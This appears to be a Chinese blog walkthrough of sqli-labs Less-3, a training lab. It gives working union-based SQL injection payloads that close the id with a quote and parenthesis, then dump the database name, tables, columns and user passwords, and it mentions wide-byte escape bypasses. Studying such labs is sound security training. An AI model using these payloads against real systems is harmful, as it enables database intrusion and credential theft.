【SQL注入】Less-3错误型GET单引号变形字符型注入

最新推荐文章于 2024-01-07 17:41:25 发布
最新推荐文章于 2024-01-07 17:41:25 发布
阅读量352 收藏 2
点赞数
分类专栏: CTF 文章标签: mysql sql 数据库 sql注入 ctf
原文链接:https://www.anquanlong.com/lab_introduce?lab_id=3
版权

Less-3错误型GET单引号变形字符型注入

什么是sql变形字符串注入?最常见的有:
1、将查询条件转为base64
2、本实验用)来实现变形;
3、宽字节字体编码利用,例如gbk中文字符,这种比较难用;例如试图用%df%5c%27试图在%df%5c%27为中文字符绕过%27PHP魔术引用的转义成\%27但也要取决于环境;故此宽字节去做sql注入的转义绕过很难。

实验漏洞复现介绍

该实验与Less-2错误型GET整型注入 区别在于,构建payload新增')单引号;)表示变形!

1、爆开数据库

payload

?id=0') union select 1,2,database() --+

2、爆开数据表

payload

?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0') union select 1,group_concat(username,0x3a,password),3 from users--+
Mitch311
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 手工注入 变形上传拿shell
10-21
SQL 手工注入 变形上传拿shell 上传分析
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
SQL注入知识点总结
qq_43332077的博客
12-12 295
SQL注入之过滤,绕过 绕过的方法: 1.大小写变形(混写) 2.编码,hex,urlencode 3.注释 4.过滤替换 5.截断 Less-23 1.通过页面显示,得知数据提交方式为get 2.测试闭合方式 单引号闭合:页面回显语法错误 双引号闭合:页面回显正确 括号闭合:页面回显正确 我们得知,闭合方式为’ '单引号闭合 插入sql注入语句: 我们发现插入完整的sql语句,页面任...
各种SQL注入攻击
最新发布
m0_51227834的博客
01-07 175
http header信息头是HTTP协议的重要组成部分,包含了一数据段来于服务器进行通信。我们这里主要是利用三个:UA、X-Forwarded-For和Referer。UA:很多网站用他来判断操作系统和浏览器类,来展示对应的页面。也有很多通过UA来判断访问是否合法,是用户访问还是程序访问等。X-Forwarded-For被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准。部分网站通过它来辨别访问者的IP信息。Referer是来源信息,在防盗链中使用广泛。
SQL注入sqlilabs:less-1
Dmajorcanon的博客
02-21 3671
sqlilabs个人练习及解题思路√
SQL注入检测的各种变形
weixin_30376083的博客
03-27 72
空格的变形:+| %20 | 2个空格| tab | enter | Mysql,MSSQL,ACCESS /**/。 MSSQL 字母的变形:大小写的转换。 Mysql,MSSQL,ACCESS 通过类转换修饰符N绕过:'1’=N’1 Mysql,MSSQL 通过+号拆解字符串绕过:'abc’='a’%2B’bc’ MSSQL,ACCESS 提交的时候加%: se%l%e%c%t M...
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2200
sqli第三关简要步骤
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 384
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
SQL注入之BASE64变形注入
秋水的博客
09-02 3071
注入简介 什么是base64注入? base64注入是针对传递的参数被base64加密后的注入点进行注入。除了数据被加密意外,其中注入方式与常规注入一般无二 编码工具选择 在线工具:http://tool.oschina.net/encrypt?type=3 也可以使用burp中自带的编码模块(decoder) 如何发现此漏洞? 在互联网系统中,目前遇到两种base64加密...
SQL注入的几种类和原理
Karka_的博客
07-21 444
老实说,这篇笔记鸽了3个星期左右,有几个原因。漏洞点都要自己进行验证,比较缓慢最近工作上有点忙,下班无心学习我在摸鱼……。笔者学习是比较容易偏离方向,比如DNSlog盲注时抓包发现请求有点不合常理,又跑去找资料看……老实说,这篇笔记鸽了3个星期左右,有几个原因。漏洞点都要自己进行验证,比较缓慢最近工作上有点忙,下班无心学习我在摸鱼……。笔者学习是比较容易偏离方向,比如DNSlog盲注时抓包发现请求有点不合常理,又跑去找资料看……
SQL注入绕过的技巧总结
12-14
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是在,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友应该懂得要做一下sql注入过滤。   SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。   一、引号绕过   会使用到引号的地方是在于后的whe
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入 支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
安装过程中可能会遇到各种问题,需要根据错误提示搜索解决方案。安装之前,务必先了解可能遇到的问题,例如初始化数据库时连接不上的问题和 mysqli_connect 函数报错的问题。 知识点 3: sqli-labs 下载和配置 下载...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误GET单引号变形字符注入
sm1918451478的博客
10-31 368
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误GET单引号变形字符注入
sqli-lab教程——Less-3 GET - Error based - Single quotes with twist string (基于错误GET单引号变形字符注入)
luosaierdadi的博客
07-06 132
输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select ... from ... where id=(‘1’) ...,在第一题中id=1‘的后面单引号加上),其它保持不变就行了。其实我推荐,做完题去看看它题目的php传参语句,和过滤语句,对理解sql注入原理很有帮助的。......
sqli-labs-master第一关:基于错误GET单引号字符注入
weixin_34402408的博客
11-12 418
首先来到第一关: http://127.0.0.1/sqli-labs-master/Less-1/ 用语句http://127.0.0.1/sqli-labs-master/Less-1/?id=1'进行测试报错 可以看到sql语句出错了。 用 and 1 = 1去测试: http://127.0.0.1/sqli-labs-maste...
sql-labs SQL注入平台-第3关Less-3 GET - Error based - Single quotes with twist string (基于错误GET单引号变形字符注入)
Onlyone_1314的博客
05-28 199
Less-3 GET - Error based - Single quotes with twist string (基于错误GET单引号变形字符注入)查看源代码发现我们输入的id值被括号(‘’)包围起来了,这样导致我们输入的值都会被当作括号里的id。成功使用union联合查询。
GET传输+单引号字符注入+联合查询SQL注入实验中我学到了什么
06-03
GET传输中,参数通过URL传递给服务器,如果参数中包含特殊字符,如单引号,可能会导致SQL注入攻击。在单引号字符注入中,攻击者会在参数值中插入单引号,使得SQL语句结构被破坏,从而可以执行恶意操作。在联合查询SQL注入中,攻击者会在参数值中插入SQL语句,使得该语句与原始查询语句联合执行,从而可以获取更多的数据或者执行恶意操作。因此,在开发过程中,要注意对用户输入进行过滤和转义,避免SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值